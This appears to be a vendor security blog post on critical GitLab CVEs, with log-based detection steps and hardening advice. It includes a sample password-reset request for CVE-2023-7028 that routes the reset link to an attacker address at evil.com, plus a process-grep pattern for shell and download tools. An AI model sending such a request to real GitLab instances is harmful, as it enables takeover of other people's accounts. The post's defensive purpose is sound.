
GitLab: Critical CVEs and Securing Your Self-Hosted Instance

Self-hosted GitLab instances have been hit by a series of critical vulnerabilities, including RCE and account takeover. An analysis of the major CVEs and security best practices for your instance.

23 April 2026, 3 min read

GitLab is the most widely deployed open-source DevOps platform in self-hosted environments. Thousands of companies host their source code, CI/CD pipelines and infrastructure secrets on internal or internet-exposed GitLab instances. Critical GitLab vulnerabilities can grant access to an organization's entire codebase and secrets.

CVE-2021-22205: Unauthenticated RCE (CVSS 10.0)

The Worst GitLab CVE in History

CVE-2021-22205 is an unauthenticated remote code execution vulnerability via ExifTool — the library used by GitLab to process image metadata from uploads.

How it works:

GitLab automatically passes every uploaded image to ExifTool to extract metadata. A vulnerability in ExifTool's DjVu file handling allows injecting arbitrary commands in the metadata, which execute with GitLab server privileges.

Image with malicious metadata → ExifTool → Command execution

Affected versions: GitLab CE/EE 11.9 through 13.10.2 (before 13.10.3)
CVSS Score: 10.0

Mass Exploitation in 2021

Despite a patch having been available since April 2021, a November 2021 study revealed that ~50% of GitLab instances exposed to the internet were still unpatched. Tens of thousands of servers were compromised to deploy cryptocurrency miners and backdoors.

CVE-2023-7028: Zero-Click Account Takeover (CVSS 10.0)

No User Interaction Required

In January 2024, GitLab disclosed CVE-2023-7028 — a vulnerability enabling takeover of any GitLab account without user interaction.

Mechanism:

A flaw in the password reset feature allows sending the reset email to an arbitrary attacker-controlled address, simply by manipulating the email parameter in the reset request.

POST /users/password HTTP/1.1

user[email][]=victim@company.com&user[email][]=attacker@evil.com

GitLab would send the reset link to BOTH addresses — allowing the attacker to take over the account without the victim ever clicking anything.

Affected versions: GitLab CE/EE 16.1 through 16.7.1
CVSS Score: 10.0

If the targeted account has MFA enabled, the password reset alone isn't sufficient for a takeover. Combined with CVE-2023-5356 (CVSS 9.6, Slack/Mattermost slash command abuse for code execution), however, it achieves full RCE.

CVE-2022-2884: RCE via GitHub Import (CVSS 9.9)

A flaw in GitLab's GitHub import feature allowed an authenticated user to execute code on the GitLab server. It exploited a command injection in the parser for GitHub API responses.

CVE-2024-45409: SAML Auth Bypass (CVSS 10.0)

In September 2024, a SAML authentication bypass was disclosed in the ruby-saml gem used by GitLab. It allowed an attacker to authenticate as any user via a forged SAML response.

Detecting a Compromise

Logs to Monitor

# GitLab authentication logs
/var/log/gitlab/gitlab-rails/production_json.log

# Look for unusual authentications
grep "password_reset" /var/log/gitlab/gitlab-rails/production_json.log | tail -100

# Suspicious API access
grep "method.*POST.*upload" /var/log/gitlab/nginx/gitlab_access.log
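To turn the password_reset grep above into a check for the CVE-2023-7028 pattern, here is an added example (not from the original post) that scans production_json.log line by line and reports password reset requests whose user[email] parameter carries more than one address. It assumes the JSON fields controller, action, params (a list of key/value objects), remote_ip and time as GitLab writes them; the log lines embedded below are constructed samples.

```python
import json
from typing import Iterable

# Constructed sample lines imitating GitLab's production_json.log (one JSON object per line).
SAMPLE_LOG = """\
{"method":"POST","path":"/users/password","controller":"PasswordsController","action":"create","remote_ip":"10.0.0.5","time":"2024-01-12T09:10:11.000Z","params":[{"key":"user","value":{"email":["alice@company.example"]}}]}
{"method":"POST","path":"/users/password","controller":"PasswordsController","action":"create","remote_ip":"203.0.113.7","time":"2024-01-12T09:12:30.000Z","params":[{"key":"user","value":{"email":["victim@company.example","attacker@evil.example"]}}]}
{"method":"GET","path":"/api/v4/projects","controller":"API::Projects","action":"index","remote_ip":"10.0.0.9","time":"2024-01-12T09:13:00.000Z","params":[]}
not json at all
"""


def reset_emails(entry: dict) -> list[str]:
    """Return the email values sent with a password-reset request, or [] for any other request."""
    if entry.get("controller") != "PasswordsController" or entry.get("action") != "create":
        return []
    for param in entry.get("params", []):
        if param.get("key") != "user":
            continue
        emails = (param.get("value") or {}).get("email", [])
        # A single address may be logged as a plain string; normalise to a list.
        return [emails] if isinstance(emails, str) else list(emails)
    return []


def find_suspicious_resets(lines: Iterable[str]) -> list[dict]:
    """Flag password-reset requests carrying more than one email (the CVE-2023-7028 pattern)."""
    hits = []
    for line in lines:
        try:
            entry = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip non-JSON lines (e.g. truncated writes)
        emails = reset_emails(entry)
        if len(emails) > 1:
            hits.append({"time": entry.get("time"), "remote_ip": entry.get("remote_ip"), "emails": emails})
    return hits


if __name__ == "__main__":
    # Replace SAMPLE_LOG.splitlines() with open("/var/log/gitlab/gitlab-rails/production_json.log") on a real host.
    for hit in find_suspicious_resets(SAMPLE_LOG.splitlines()):
        print(f"{hit['time']} {hit['remote_ip']} reset requested for {', '.join(hit['emails'])}")
```

A legitimate reset carries exactly one address, so any hit is worth investigating, especially when the source IP is outside your address space.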

IOCs for CVE-2021-22205

# Look for suspicious processes launched by the git user
ps aux | grep git | grep -E "bash|sh|curl|wget|python"

# Check git user crontabs
crontab -u git -l

# Recently modified files in GitLab directories
# (first create the reference timestamp, e.g. touch -d "2021-04-14" /tmp/ref_date)
find /var/opt/gitlab -newer /tmp/ref_date -type f | grep -v ".log"

Securing GitLab

1. Update Regularly

GitLab frequently releases critical security patches. Subscribe to its security release notifications and keep your instance current:

# Check current version
gitlab-rake gitlab:env:info | grep "GitLab"

# Update (Omnibus package)
apt-get update && apt-get install gitlab-ee
# or
yum update gitlab-ee

2. Restrict Network Access

If GitLab is self-hosted, evaluate whether it truly needs to be internet-accessible:

# Example nginx: restrict to authorized IPs
location / {
    allow 10.0.0.0/8;
    allow 192.168.0.0/16;
    deny all;
}

3. Disable Public Sign-Ups

Admin Area → Settings → General → Sign-up restrictions
→ Uncheck "Sign-up enabled"
→ Enable "Require admin approval for new sign-ups"

4. Enforce MFA

Admin Area → Settings → General → Sign-in restrictions
→ Enable "Two-factor authentication" for all users

5. Restrict External Imports

Disable GitHub/Bitbucket/etc. imports if not needed — they're an attack vector (CVE-2022-2884).

6. GitLab CI Runners: Isolate Executors

GitLab CI runners execute potentially untrusted code. Use isolated Docker executors, and never run the shell executor on the GitLab server itself.


Register your GitLab version in your asset inventory on cveo.tech to receive alerts as soon as a critical CVE is published.
